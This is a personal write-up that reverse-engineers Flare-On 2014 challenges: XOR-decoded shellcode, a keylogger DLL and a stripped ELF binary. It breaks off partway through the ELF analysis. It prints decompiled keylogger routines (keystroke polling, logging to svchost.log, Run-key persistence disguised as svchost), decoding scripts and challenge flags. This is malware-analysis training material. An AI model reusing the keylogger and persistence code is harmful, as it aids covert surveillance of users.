SHA256: 71d7690eaab011871f8e957c354e96baa16ed14ddcf719caf0776917b5eebe2d

Basic Static Analysis

I quickly check VT for this hash and only 1 out of 54 which means this can be obfuscated and some spoofy things,

For simplicity i used tool flare-floss for intelligent string analysis and here is what i found,

┌──(b14cky㉿DESKTOP-VRSQRAJ)-[~]
└─$ /opt/floss shellcode.bin --format sc32

INFO: floss: extracting static strings
finding decoding function features: 100%|█████████████████████████████████████████████████████████████████████| 1/1 [00:00<00:00, 126.37 functions/s, skipped 0 library functions]
INFO: floss.stackstrings: extracting stackstrings from 1 functions
INFO: floss.results: LoadLibraryA
INFO: floss.results: user32
INFO: floss.results: MessageBoxA
INFO: floss.results: OWNED!!!
INFO: floss.results: 2OWNED!!!
INFO: floss.results: OWNE
INFO: floss.results: ExitProcessb
extracting stackstrings: 100%|██████████████████████████████████████████████████████████████████████████████████████████████████████████████| 1/1 [00:00<00:00, 28.02 functions/s]
INFO: floss.tightstrings: extracting tightstrings from 0 functions...
extracting tightstrings: 0 functions [00:00, ? functions/s]
INFO: floss.string_decoder: decoding strings
decoding strings: 100%|█████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 1/1 [00:00<00:00, 85.55 functions/s]
INFO: floss: finished execution after 7.19 seconds
INFO: floss: rendering results


FLARE FLOSS RESULTS (version v3.1.1-0-g3cd3ee6)

.
.
.

 ───────────────────────────
  FLOSS STATIC STRINGS (31)
 ───────────────────────────

+----------------------------------+
| FLOSS STATIC STRINGS: ASCII (31) |
+----------------------------------+

rIF%
xsq}
$~|C
.
.
.
hess
hProchExitT
T$@W


+------------------------------------+
| FLOSS STATIC STRINGS: UTF-16LE (0) |
+------------------------------------+


 ─────────────────────────
  FLOSS STACK STRINGS (7)
 ─────────────────────────

LoadLibraryA
user32
MessageBoxA
OWNED!!!
2OWNED!!!
OWNE
ExitProcessb

 ─────────────────────────
  FLOSS TIGHT STRINGS (0)
 ─────────────────────────
 ───────────────────────────
  FLOSS DECODED STRINGS (0)

There are some interesting stack strings,
- LoadLibraryA : loads required Windows DLLs at runtime
- MessageBoxA : displays a message box (proof of code execution)
- ExitProcess : - cleanly terminates the program after execution
And some string so we will look that later,

Advance Static Analysis

To analyze this shellcode, i can use cutter so i simply paste shellcode in cutter and analyze the assembly,

In this disassembler, there are 2 functions, fcn.00000000 and fcn.0000035e,
fcn.00000000 looks very large and messy,

I analyze some part of fcn.00000000 and i found that it is loading some strings in stack for some purpose as we discuss earlier,

![[Learning/DFIR & MARE/Reverse Engineering/Flare-On/2014/images/Pasted image 20260118140837.png]]

So i look at the fcn.0000035e function and i found that,
- It is building encrypted data on the stack and decrypting it in place using XOR, so the real strings only exist in memory at runtime.

Here is the script that do whole decryption and transformation of hex and convert it to ascii,

# XOR operations
xor_pairs = [
    (0x32fba316, 0x32bece79),
    (0x48cf45ae, 0x2be12bc1),
    (0xd29f3610, 0xfffa4471),
    (0x0ca9a9f7, 0x60cfe984),
    (0x43a993be, 0x3798a3d2),
    (0x3b628a82, 0x4b11a4ef),
    (0xccc047d6, 0xffa469be),
    (0x3154caa3, 0x5265abd4)
]

# Calculate XOR results
xor_results = [val1 ^ val2 for val1, val2 in xor_pairs]
print("XOR Results:", [f"0x{r:08x}" for r in xor_results])

# Combine into single hex string
combined_hex = ''.join([f"{result:08x}" for result in xor_results])
print(f"Combined: {combined_hex}")

# Convert to bytes and reverse
hex_bytes = bytes.fromhex(combined_hex)
reversed_bytes = hex_bytes[::-1]

# Convert to ASCII
output = reversed_bytes.decode('ascii', errors='replace')
print(f"Output: {output}")

┌──(b14cky㉿DESKTOP-VRSQRAJ)-[~/]
└─$ python decr.py

XOR Results: ['0x00456d6f', '0x632e6e6f', '0x2d657261', '0x6c664073', '0x7431306c', '0x70732e6d', '0x33642e68', '0x63316177']
Combined: 00456d6f632e6e6f2d6572616c6640737431306c70732e6d33642e6863316177
Output: wa1ch.d3m.spl01ts@flare-on.comE

Here is the flag using static method,

wa1ch.d3m.spl01ts@flare-on.com

Advance Dynamic Analysis

0x00000359      call    fcn.0000035e ; fcn.0000035e ;  fcn.0000035e(int64_t arg1)
fcn.0000035e(int64_t arg1);
; arg int64_t arg1 @ rdi
; var int64_t var_65h @ stack - 0x65
; var int64_t var_48h @ stack - 0x48
; var int64_t var_40h @ stack - 0x40
0x0000035e      mov     edx, dword [rsp]
0x00000361      xor     dword [rdx + 0xb], 0x32fba316
0x00000368      push    0x32bece79
0x0000036d      xor     dword [rdx + 0x17], 0x48cf45ae
0x00000374      push    0x2be12bc1
0x00000379      xor     dword [rdx + 0x23], 0xd29f3610
0x00000380      push    0xfffffffffffa4471
0x00000385      xor     dword [rdx + 0x2f], 0xca9a9f7
0x0000038c      push    0x60cfe984
0x00000391      xor     dword [rdx + 0x3b], 0x43a993be
0x00000398      push    0x3798a3d2
0x0000039d      xor     dword [rdx + 0x47], 0x3b628a82
0x000003a4      push    0x4b11a4ef
0x000003a9      xor     dword [rdx + 0x53], 0xccc047d6
0x000003b0      push    0xffffffffffa469be
0x000003b5      xor     dword [rdx + 0x5f], 0x3154caa3
0x000003bc      push    0x5265abd4
0x000003c1      mov     ecx, esp

This is how it works,
Now you might think that doing XOR first and then push value which is kind of reverse Because,
- It happens because the shellcode modifies its own instructions in memory.
- The values you see in push 32BECE79 are encrypted operands.
  - Before that instruction executes, the shellcode does:

xor dword ptr [edx+offset], key

This XOR rewrites the PUSH instruction itself in memory.
So when execution later reaches that instruction, the CPU fetches the modified bytes, not the original ones.
That’s why:

push 32BECE79 → becomes → push 00456D6F

Flag Extraction

By putting breakpoint on 004013C1 we can see that esp is point to out flag so i do follow in dump for esp and i got the flag.

004013C1 | 8BCC                     | mov ecx,esp

Alon with flag we get those strings also which we got using floss, which are used to prompt a message box with some random text,

0019FF1C   77 61 31 63 68 2E 64 33 6D 2E 73 70 6C 30 31 74  wa1ch.d3m.spl01t
0019FF2C   73 40 66 6C 61 72 65 2D 6F 6E 2E 63 6F 6D 45 00  s@flare-on.comE
0019FF3C   5E 13 40 00 4F 57 4E 45 44 21 21 21 00 00 00 00  ^.@.OWNED
0019FF4C   4D 65 73 73 61 67 65 42 6F 78 41 00 75 73 65 72  MessageBoxA.
0019FF5C   33 32 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41  32..LoadLibraryA

Here is out Flag, 😗

wa1ch.d3m.spl01ts@flare-on.com

Challenge 5:

Stage 1 Analyzing PE File

Initial Triage

File Type: 5get_it: PE32 executable for MS Windows 5.01 (DLL), Intel i386, 4 sections
Size: 99KB
SHA256: 2225b6966b9baae11ee5a8412201b30fd72c4a10e92727d92acf5ea6b5df9176

Basic Static Analysis

Just quick VT search,
- It gives 48/69 hits so it is malicious and marked KeyLogger so maybe some keystroke things will be there,

Detect it Easy is showing that it is written in C++ and compiled with Visual Studio (2010).
- Also it is not packed because entropy is nomal,

Now we can analyze this binary with pestudio to get more idea,
In-fact, it gives lots of info such as,
- Our sample is a 32 bit DLL file with entry point address of 0x0000B186 and size of 101376 Bytes.
- And this binary compiled in 2014.

Now some silly floss things to see any interesting strings,
- it quite big and lots things are there so let's break it down and show you some stuff.
As i said previously, this are some keystrokes,
- And to store them it impersonate the svchost a legit process's log file which is svchost.log,

[SHIFT]
[RETURN]
[BACKSPACE]
[TAB]
[CTRL]
[DELETE]
[CAPS LOCK]
GetAsyncKeyState
svchost.log

It is a Keyboard + file write combo
- capture keystroke → write to file → flush.

GetAsyncKeyState
WriteFile
CreateFileA/W
FlushFileBuffers
SetFilePointer

Some registry keys used to do persistence with it's related Windows APIs,

SOFTWARE\Microsoft\Windows\CurrentVersion\Run
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
RegCloseKey
RegQueryValueExA
RegOpenKeyExA
RegSetValueExA
RegCreateKeyA

Something with DLL stuff,
- It references c:\windows\system32\svchost.dll and svchost.log but there is no such file (Windows has svchost.exe in that location).
- There is also c:\windows\system32\rundll32.exe c:\windows\system32\svchost.dll which means this file is most probably a DLL and should be executed like that.
- There are no parameters, so whatever this DLL is doing should be in DllMain.

c:\windows\system32\svchost.dll
c:\windows\system32\rundll32.exe c:\windows\system32\svchost.dll

Windows APIs related to Anti-Analysis Technique,

IsDebuggerPresent
Sleep
QueryPerformanceCounter

Finally, FLOSS decoded strings,

Courier New
DDNDNNNNDND
.
.
.
FLARE ON!

So only based on these basic analysis, we take overview of malware that how it could behave which helps us in advance analysis.

Advance Static Analysis

Now Buckle down because we jumping into IDA for some low level stuff,
As i said previously, there is only one export which is DLLEntryPoint,
The Windows loader calls the DLL’s entry point defined in the PE Optional Header, which in MSVC-built DLLs is typically DllMainCRTStartup (often labeled as DLLEntryPoint by IDA).
And this DllMainCRTStartup will call DLLMain.

Here is the flow,
----------------------
Windows Loader
   ↓
AddressOfEntryPoint
   ↓
__DllMainCRTStartup
   ↓
DllMain
----------------------

More Technically it do these process,

ntdll!LdrLoadDll
    ↓
ntdll!LdrpCallInitRoutine
    ↓
PE.OptionalHeader.AddressOfEntryPoint
    ↓
__DllMainCRTStartup   ← CRT
    ↓
DllMain               ← user code

Here is the crux explanation,
- When a DLL is loaded, ntdll!LdrLoadDll maps it into memory, LdrpCallInitRoutine decides initialization, the loader jumps to the PE’s AddressOfEntryPoint (usually __DllMainCRTStartup), which initializes the C runtime (TLS, heap, SEH, globals) and finally calls the user-defined DllMain under the loader lock.

Here is the DLLMain Called,

Now this DLLMain is calling other bunch of other functions,
Here is function tree,
- sub_1000A570() - Doing Persistence by adding key in Registry
- sub_1000A610() - Checking the Key already present of not
- sub_1000AD77() - nothing important..
- sub_1000A4C0() - Just adding some noise to delay the process
  - sub_10009EB0 - Switch Case with all ASCII Chars
    - sub_10009AF0() - Case of Char 'M'
      - sub_10009AF0() - Hidden Function
  - sub_10001000

`sub_1000A570` function,

First i analyzed the sub_1000A570 function,

Inside the function we encounter RegOpenKeyEx that opens a registry key.
Full registry key is a combination of hKey and lpSubKey. hKey can be one of the predefined keys.
The constants for the predefined keys needed a bit of googling because the MSDN page didn't list them. Here they are:

| Key                 | Constant |
|---------------------|----------|
| HKEY_CLASSES_ROOT   |    0     |
| HKEY_CURRENT_USER   |    1     |
| HKEY_LOCAL_MACHINE  |    2     |
| HKEY_USERS          |    3     |
| HKEY_CURRENT_CONFIG |    5     |

v3 = RegOpenKeyExA(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", 0, 1u, &phkResult);

Here is the arguments and if we map with MSDN function then it looks like this,

LSTATUS RegOpenKeyExA(
  [in]           HKEY   hKey,        // HKEY_LOCAL_MACHINE (0x80000002)
  [in, optional] LPCSTR lpSubKey,     // "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
  [in]           DWORD  ulOptions,    // 0
  [in]           REGSAM samDesired,   // KEY_QUERY_VALUE (0x0001)
  [out]          PHKEY  phkResult     // &phkResult
);

So if we move further,
If function succeeds it will return ERROR_SUCCESS which is 0 according to this page, otherwise it will return another error code.
db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0 in .rdata section.
The binary will check if it has access to registry at that path.
If so then the return value (in eax) will be 0 and it will jump right (JZ will succeed).

v3 = RegQueryValueExA(phkResult, "svchost", 0, 0, Data, &cbData);

Here is the arguments and if we map with MSDN function then it looks like this,

LSTATUS RegQueryValueExA(
  [in]                HKEY    hKey,        // phkResult
  [in, optional]      LPCSTR  lpValueName, // "svchost"
                      LPDWORD lpReserved,  // 0
  [out, optional]     LPDWORD lpType,      // 0
  [out, optional]     LPBYTE  lpData,      // Data
  [in, out, optional] LPDWORD lpcbData     // &cbData
);

RegQueryValueEx checks if there is a registry key at an open path.
It is looking for a registry key named svchost at that path. If such key exists, function will return 0.
In this case, it returned 2 which stands for ERROR_FILE_NOT_FOUND meaning there was no such key.
Then it will call RegCloseKey and closes the open registry path. This function's return value is saved in var_110 (we will need it later):

|           Condition          |         Return Value          |
|------------------------------|-------------------------------|
|Registry key cannot be opened |               1               |
|Registry key does not exist   |               2               |
|Registry key exists           | 1000A6BB or DllMain(x,x,x)+3B |

This DLL is self-installing malware that checks whether it already has persistence, installed itself if not, disguises itself as svchost, registers itself to run at every system startup via the Windows Run registry key, executes itself using rundll32, hides its console, and then enters an infinite loop performing its main malicious activity.
Now it calls sub_1000A610,

`sub_1000A610` function,

Now this sub_1000A610 similar as previous and here is pseudocode,

int __cdecl sub_1000A610(BYTE *lpData)
{
  size_t v1; // eax
  HKEY phkResult[2]; // [esp+4h] [ebp-8h] BYREF

  if ( RegCreateKeyA(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", phkResult) )
    return 1;
  v1 = strlen((const char *)lpData);
  RegSetValueExA(phkResult[0], "svchost", 0, 1u, lpData, v1);
  phkResult[1] = 0;
  return 0;
}

We see that it is calling GetModuleHandleEx for sub_1000A610 and checks the return value .
The return value for GetModuleHandleEx will be non-zero, otherwise it will be zero. If call was not successful then last error will be printed to file.

If GetModuleHandleEx was successful it will land here.
GetModuleFileName is called which will return the full path for the specified module in hModule.
In this case, the binary retrieves its own path and saves it in [ebp+Filename].in return value of sub_1000A570 is compared with 2.
If registry key did not exist, we will continue.
We have already seen the strings being loaded.
Then CopyFileA is called to copy itself to c:\\windows\\system32\\svchost.dll.
It c:\windows\system32\rundll32.exe c:\windows\system32\svchost.dll to the stack and calls sub_1000A610 .
Based on this string and checking for existence of the registry key we can guess what is going to happen in this function.
Inside this function we see that RegCreateKey to open HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run. If the key does not exist, it will create it.
If call was successful, execution continues.
It is adding a new registry key named svchost to that path with the specified value. Then function will return with the result value of RegSetValueEx.
If it was successful, it will be 0.
The Dll copied itself to system32 and it will run every time Windows starts.

`sub_1000A4C0` Function

Runs forever and repeatedly performs random‑count tasks using data returned by another function, with artificial delays and memory allocation used mainly for noise / evasion.
In short just not usefull.

void __noreturn sub_1000A4C0()
{
  char *Buffer; // [esp+0h] [ebp-14h]
  int v1; // [esp+4h] [ebp-10h]
  void *v2; // [esp+8h] [ebp-Ch]
  __int16 v3; // [esp+Ch] [ebp-8h]

  while ( 1 )
  {
    v1 = rand() % 200 + 50;
    v2 = malloc(15 * v1);
    memset(v2, 0, 15 * v1);
    Sleep(0xAu);
    v3 = 0;
    while ( v3 < v1 )
    {
      Sleep(0xAu);
      Buffer = (char *)sub_10009EB0();
      if ( Buffer )
      {
        sub_10001000(Buffer);
        ++v3;
      }
    }
  }
}

`sub_10009EB0` function,

This loop is Scanning all keyboard keys to detect which key is pressed.
Loops through all virtual key codes from 8 to 222 and stops when it finds which key the user pressed.
A classic keylogger polling logic.
Here is mapping table of keystrokes and value,

SHORT GetAsyncKeyState(
  [in] int vKey // The virtual-key code
);

VK (Virtual key codes)	Value
VK_BACK	8
VK_TAB	9
VK_RETURN	13
VK_SHIFT	16
VK_CONTROL	17
VK_MENU (Alt)	18
VK_ESCAPE	27
'A' - 'Z' or 'a' - 'z'	65–90
F1–F12	112–123

for ( i = 8; ; ++i )
{
	if ( i > 222 )
	  return 0;
	if ( GetAsyncKeyState(i) == 0xFFFF8001 )
	  break;
	  .
	  .
	  .

After getting that pressed key, we just pass it to switch case which will further call some functions,
And those functions are nothing but just a wrapper which return same character,

if given input is NOT a normal character then it goes to 2nd switch case,

v1 = i - 8;
switch (i)
{
	case 8:
	....
	case 190:
}

Final crux of this function,
And one importent thing,
- This function is a keystroke dispatcher, not a string collector.
- It means this whole process happens for one char only and function return and execution goes to next function which is sub_10001000(Buffer);,

wait until user presses a key

if key is a letter/number/symbol:
    return that character
else if key is Enter / Backspace / Space / Shift:
    handle that action
else:
    ignore and keep waiting

`sub_10001000` function

Writes the received character into a file called svchost.log.
And this whole process happens with that sub_1000A4C0 function sleep time or just delay to make it stealth.

int __cdecl sub_10001000(char *Buffer)
{
  FILE *Stream; // [esp+0h] [ebp-4h]

  for ( Stream = 0; !Stream; Stream = fopen("svchost.log", "a+") )
    Sleep(0xAu);
  fputs(Buffer, Stream);
  fclose(Stream);
  return 1;
}

Now what about flag,
Here is some puzzle thing,
- This function is for char 'M' and it has hidden logic,
- sub_10001240 hidden function

const char *sub_10009AF0()
{
  if ( dword_100194FC > 0 )
  {
    _cfltcvt_init();
    sub_10001240();
  }
  return "m";
}

now this sub_10001240() is just printing banner with some cools ascii art,

INT_PTR sub_10001240()
{
  HINSTANCE WindowLongA; // [esp+0h] [ebp-1590h]
  wchar_t v2[12]; // [esp+4h] [ebp-158Ch] BYREF
  HWND hWnd; // [esp+1Ch] [ebp-1574h]
  wchar_t v4[2728]; // [esp+20h] [ebp-1570h] BYREF
  LPARAM dwInitParam; // [esp+1570h] [ebp-20h]
  HINSTANCE hInstance; // [esp+1574h] [ebp-1Ch]
  wchar_t Source[10]; // [esp+1578h] [ebp-18h] BYREF

  hWnd = 0;
  dwInitParam = 0;
  wcscpy(v2, L"Courier New");
  wcscpy(Source, L"FLARE ON!");
  wcscpy(
    v4,
    L"_______________________________________________NDD__________________________________________________\n"
     "______________________________________________DDDDD_________________________________________________\n"
     "______________________________________________DDDDDN________________________________________________\n"
     "_____________________________________________DDDDDDD________________________________________________\n"
     "NNNNNNNNDDN________DNNN_____________________NDDDDDDDD_______________NNNNNNNNDN__________DNNNNNNNNNNN\n"
     "DDDDDDDDDDD________NDDD____________________NDDDDDDDDDN______________DDDDDDDDDDDD________DDDDDDDDDDDD\n"
     "DDDDDDDDDDD________NDDD____________________NDDDDDDDDDD______________DDDDDDDDDDDDN_______NDDDDDDDDDDD\n"
     "DDDD_______________DDDD___________________NDDDDDDDDDDDD_____________DDDD_____NDDD_______DDDD________\n"
     "DDDD_______________DDDD__________________DDDDDDD_DDDDDDN____________DDDD_____DDDD_______DDDD________\n"
     "DDDDDDDDDD_________DDDD__________________NDDDDD___DDDDDDN___________DDDDDNNNNDDDN_______DDDDDDDDDD__\n"
     "DDDDDDDDDD_________DDDD_________________DDDDDDN___DNDDDDD___________DDDDDDDDDDD_________DDDDDDDDDD__\n"
     "DDDD_______________DDDD________________DDDDDDD_____DDDDDDD__________DDDD__DDDD__________DDDD________\n"
     "DDDD_______________DDDD_______________DDDDDDD_______DDDDDDD_________DDDD__NNDDD_________DDDD________\n"
     "DDDD_______________DDDDNNNNNN_________NDDDDDN_______NDDDDDD_________DDDD___DDDDN________DDDDNNNNNNNN\n"
     "DDDD_______________DDDDDDDDDDD_______NDDDDDD_________NDDDDDD________DDDD____DDDD________DDDDDDDDDDDD\n"
     "DDDN_______________DDDDDDDDDDN______NDDDDDDDDDDDDDDD__DDDDDDD_______NDDD_____DDDD_______DDDDDDDDDDDN\n"
     "____________________________________DDDDDDDDDDDDDDDN___DDDDDDN______________________________________\n"
     "___________________________________DDDDDDDDDDDDDDD_____DDDDDDD______________________________________\n"
     "__________________________________DDDDDDDDDDDDDDN_______DDDDDDD_____________________________________\n"
     "________________________________________NDDDDDN_____________________________________________________\n"
     "_______________________________________DNDDDDN______________________________________________________\n"
     "_______________________________________DDDDD________________________________________________________\n"
     "______________________________________DDDDD_________________________________________________________\n"
     "_____________________________________DDDDD__________________________________________________________\n"
     "_____________________________________NDD____________________________________________________________\n"
     "____________________________________NDD_____________________________________________________________\n"
     "___________________________________DD_______________________________________________________________\n");
  wcscpy(&Destination, Source);
  wcscpy(&word_10017034, v2);
  wcscpy(&word_10017062, v4);
  if ( hWnd )
    WindowLongA = (HINSTANCE)GetWindowLongA(hWnd, -6);
  else
    WindowLongA = GetModuleHandleA(0);
  hInstance = WindowLongA;
  return DialogBoxIndirectParamW(WindowLongA, &hDialogTemplate, hWnd, DialogFunc, dwInitParam);
}

But again it doesn't have flag so i looks up little bit and here is what i understand,
- This program pretends to be a keylogger, but it is actually a flag puzzle.
- There is NO place where the flag exists as a string.
- The flag is never stored.
- The flag is never assembled.
- The flag exists only as logic.
Under the hood:
- Each key has its own function
- Each function returns one small string
- "a"
- "m"
- "dot"
- "at"
Some functions also set hidden memory flags
Those memory flags are the real secret.
Here are those variables,

THE TRICK
- You are NOT supposed to type the flag.
- Typing is a decoy.
The real flag is determined by:
- which functions set those dword flags
- and the order of those flags
I know it looks weird and tricky, but I also find it very difficult, so this is my understanding.
So to do this i referred one python script by xbyte, so credit goes to him.
Here is the script,

#!/usr/bin/env python3

import r2pipe
import os

keys = [
    "0x10017000","0x10019460","0x10019464","0x10019468","0x1001946c",
    "0x10019470","0x10019474","0x10019478","0x1001947c","0x10019480",
    "0x10019484","0x10019488","0x1001948c","0x10019490","0x10019494",
    "0x10019498","0x1001949c","0x100194a0","0x100194a4","0x100194a8",
    "0x100194ac","0x100194b0","0x100194b4","0x100194b8","0x100194bc",
    "0x100194c0","0x100194c4","0x100194c8","0x100194cc","0x100194d0",
    "0x100194d4","0x100194d8","0x100194dc","0x100194e0","0x100194e4",
    "0x100194e8","0x100194ec","0x100194f0","0x100194f4","0x100194f8",
    "0x100194fc","0x10019500"
]

flag = ""

if os.path.isfile("5get_it.dll"):

    r2 = r2pipe.open("5get_it.dll")
    r2.cmd("aaaa")

    for key in keys:
        xrefs = r2.cmdj("axtj " + key)
        if not xrefs:
            continue

        for xref in xrefs:
            if xref.get("opcode") == f"mov dword [{key}], 1":

                fcn_called = r2.cmdj("pdfj@" + xref["fcn_name"])
                if not fcn_called:
                    continue

                for op in fcn_called.get("ops", []):
                    dis = op.get("disasm", "")
                    if "mov eax, 0x100" in dis:
                        addr = dis.split(",")[1].strip()
                        ch = r2.cmd(f"pr 1 @ {addr}")
                        flag += ch.strip()

    r2.quit()

replacements = {
    "dot": ".",
    "dash": "-",
    "at": "@"
}

for k, v in replacements.items():
    flag = flag.replace(k, v)

print(flag)

┌──(b14cky㉿DESKTOP-VRSQRAJ)-[~/]
└─$ python flag.py
WARN: Relocs has not been applied. Please use `-e bin.relocs.apply=true` or `-e bin.cache=true` next time
INFO: Analyze all flags starting with sym. and entry0 (aa)
INFO: Analyze imports (af@@@i)
INFO: Analyze entrypoint (af@ entry0)
INFO: Analyze symbols (af@@@s)
INFO: Analyze all functions arguments/locals (afva@@@F)
INFO: Analyze function calls (aac)
INFO: Analyze len bytes of instructions for references (aar)
INFO: Finding and parsing C++ vtables (avrr)
INFO: Analyzing methods (af @@ method.*)
INFO: Recovering local variables (afva@@@F)
INFO: Type matching analysis for all functions (aaft)
INFO: Propagate noreturn information (aanr)
INFO: Scanning for strings constructed in code (/azs)
INFO: Finding function preludes (aap)
INFO: Enable anal.types.constraint for experimental type propagation
l0gging.ur.5tr0ke5@flare-on.co

Here is the falg,

l0gging.ur.5tr0ke5@flare-on.co

Challenge 6:

Stage 1 ELF Analysis

Initial Triage

File Type: e7bc5d2c0cf4480348f5504196561297: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, for GNU/Linux 2.6.24, BuildID[sha1]=c65164a247cb0c44cab89c0fc06980bf6c082011, stripped
Size: 1.16 MB
SHA256: 3487e1de75bcb6f2c1425ca4f9b5da8fb66387343bf4a217c5a5cf93c79f0d9d

Basic Static Analysis

Just quick VT search,
- It gives 0/69 hits so it is very weird so we will do some analysis on it,

Detect it Easy (Die) show that this file is written in C language and compiled using GCC in ubuntu system which means it is elf binary.
It is stripped binary so symbol was be removed so it might be difficult to analyze easily.

It seems not packed so we don't need to do heavy unpacking stuff,

For better analysis i switched to remnux which is linux based malware analysis lab to doing some work on elf and linux executables.
I used readelf tool to get some info about binary and here it is,

remnux@remnux:~/Documents/Flare-on/2014/Chall5$ readelf -h e7bc5d2c0cf4480348f5504196561297 
ELF Header:
  Magic:   7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00 
  Class:                             ELF64
  Data:                              2's complement, little endian
  Version:                           1 (current)
  OS/ABI:                            UNIX - System V
  ABI Version:                       0
  Type:                              EXEC (Executable file)
  Machine:                           Advanced Micro Devices X86-64
  Version:                           0x1
  Entry point address:               0x401058
  Start of program headers:          64 (bytes into file)
  Start of section headers:          1219080 (bytes into file)
  Flags:                             0x0
  Size of this header:               64 (bytes)
  Size of program headers:           56 (bytes)
  Number of program headers:         6
  Size of section headers:           64 (bytes)
  Number of section headers:         31
  Section header string table index: 30

Here is silly floss strings which might be worth to look,
It is not that much interesting but there are some strings which looks like cpp code ad some linux commands maybe used in this binary.
there is some interesting strings which is,

/index.html Nosebleed # Heartbleed eh? :) ../nptl/sysdeps/unix/sysv/linux/x86_64/../fork.c info[20]->d_un.d_val == 7

remnux@remnux:~/Documents/Flare-on/2014/Chall5$ floss e7bc5d2c0cf4480348f5504196561297 --format sc64 | less > floss_strings.txt

INFO: floss: extracting static strings
finding decoding function features: 100%|██████████████████████| 1/1 [00:00<00:00, 453.63 functions/s, skipped 0 library functions]
INFO: floss.stackstrings: extracting stackstrings from 1 functions
extracting stackstrings: 100%|███████████████████████████████████████████████████████████████| 1/1 [00:00<00:00, 39.67 functions/s]
INFO: floss.tightstrings: extracting tightstrings from 0 functions...
extracting tightstrings: 0 functions [00:00, ? functions/s]
INFO: floss.string_decoder: decoding strings
decoding strings: 100%|█████████████████████████████████████████████████████████████████████| 1/1 [00:00<00:00, 168.85 functions/s]
INFO: floss: finished execution after 10.94 seconds
INFO: floss: rendering results

FLARE FLOSS RESULTS (version v3.1.1-0-g3cd3ee6)

+------------------------+------------------------------------------------------------------------------------+
| file path              | e7bc5d2c0cf4480348f5504196561297                                                   |
| identified language    | unknown                                                                            |
| extracted strings      |                                                                                    |
|  static strings        | 6094 (53770 characters)                                                            |
|   language strings     |    0 (    0 characters)                                                            |
|  stack strings         | 0                                                                                  |
|  tight strings         | 0                                                                                  |
|  decoded strings       | 0                                                                                  |
+------------------------+------------------------------------------------------------------------------------+


 ───────────────────────────── 
  FLOSS STATIC STRINGS (6094)  
 ───────────────────────────── 

+------------------------------------+
| FLOSS STATIC STRINGS: ASCII (6094) |
+------------------------------------+

H9\$(t
.
.
.
Logrhythm
Rails
userdel
install
which
more
Juniper
touch
wait
unexpand
7zip
0cool
apropos
IMAP
jobs
VeriSign
==:)
BIOS
Heartbleed
.
.
.
comm
rsync
tail
timeout
BBBBBBBBB@BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB>BBB?456789:;<=BBBABBB
BBBBBB
 !"#$%&'()*+,-./0123BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBFATAL: kernel too old
/dev/urandom
FATAL: cannot determine kernel version
/dev/full
/dev/null
cannot set %fs base address for thread-local storage
unexpected reloc type in static binary
cxa_atexit.c
l != ((void *)0)
__new_exitfn
LIBC_FATAL_STDERR_
/dev/tty
======= Backtrace: =========
======= Memory map: ========
/proc/self/maps
<heap nr="%d">
<sizes>
</heap>
malloc.c
((p)->size & 0x2)
(p->prev_size == offset)
<unknown>
malloc: top chunk is corrupt
corrupted double-linked list
TOP_PAD_
PERTURB_
MMAP_MAX_
ARENA_MAX
ARENA_TEST
TRIM_THRESHOLD_
MMAP_THRESHOLD_
free(): invalid pointer
invalid fastbin entry (free)
free(): invalid size
heap->ar_ptr == av
arena.c
p->size == (0|0x1)
locked
malloc(): memory corruption
(bck->bk->size & 0x4) == 0
(fwd->size & 0x4) == 0
bit != 0
correction >= 0
realloc(): invalid old size
realloc(): invalid next size
!((oldp)->size & 0x2)
ncopies >= 3
realloc(): invalid pointer
hooks.c
ms->av[2*i+3] == 0
nclears >= 3
Arena %d:
system bytes     = %10u
in use bytes     = %10u
Total (incl. mmap):
max mmap regions = %10u
max mmap bytes   = %10lu
<malloc version="1">
_int_memalign
_int_malloc
sYSMALLOc
munmap_chunk
_int_free
heap_trim
mremap_chunk
_int_realloc
__libc_malloc
__libc_realloc
__libc_valloc
__libc_pvalloc
__libc_calloc
.
.
.
<total type="fast" count="%zu" size="%zu"/>
<total type="rest" count="%zu" size="%zu"/>
<system type="current" size="%zu"/>
<system type="max" size="%zu"/>
<aspace type="total" size="%zu"/>
<aspace type="mprotect" size="%zu"/>
</malloc>
malloc_consolidate
__malloc_set_state
__libc_memalign
../sysdeps/x86_64/multiarch/../cacheinfo.c
! "cannot happen"
offset == 2
.
.
.
.
.
.
xdg-open
GCC: (Ubuntu/Linaro 4.6.3-1ubuntu5) 4.6.3
.shstrtab
.note.ABI-tag
.note.gnu.build-id
.rela.plt
.init
.text
__libc_freeres_fn
__libc_thread_freeres_fn
.fini
.rodata
__libc_atexit
__libc_subfreeres
__libc_thread_subfreeres
.eh_frame
.gcc_except_table
.tdata
.tbss
.init_array
.fini_array
.ctors
.dtors
.jcr
.data.rel.ro
.got
.got.plt
.data
.bss
__libc_freeres_ptrs
.comment


+------------------------------------+
| FLOSS STATIC STRINGS: UTF-16LE (0) |
+------------------------------------+



 ───────────────────────── 
  FLOSS STACK STRINGS (0)  
 ───────────────────────── 



 ───────────────────────── 
  FLOSS TIGHT STRINGS (0)  
 ───────────────────────── 



 ─────────────────────────── 
  FLOSS DECODED STRINGS (0)  
 ───────────────────────────

Now we we jump into some disassembly stuff

Basic Dynamic Analysis

ltrace traces library function calls, like
- printf
- strcmp
- malloc
- fopen
- puts
- exit etc..

remnux@remnux:~/Documents/Flare-on/2014/Chall5$ ltrace ./e7bc5d2c0cf4480348f5504196561297
Couldn't find .dynsym or .dynstr in "/proc/2152/exe"
remnux@remnux:~/Documents/Flare-on/2014/Chall5$ no

remnux@remnux:~/Documents/Flare-on/2014/Chall5$ ltrace ./e7bc5d2c0cf4480348f5504196561297 arg1
Couldn't find .dynsym or .dynstr in "/proc/2154/exe"
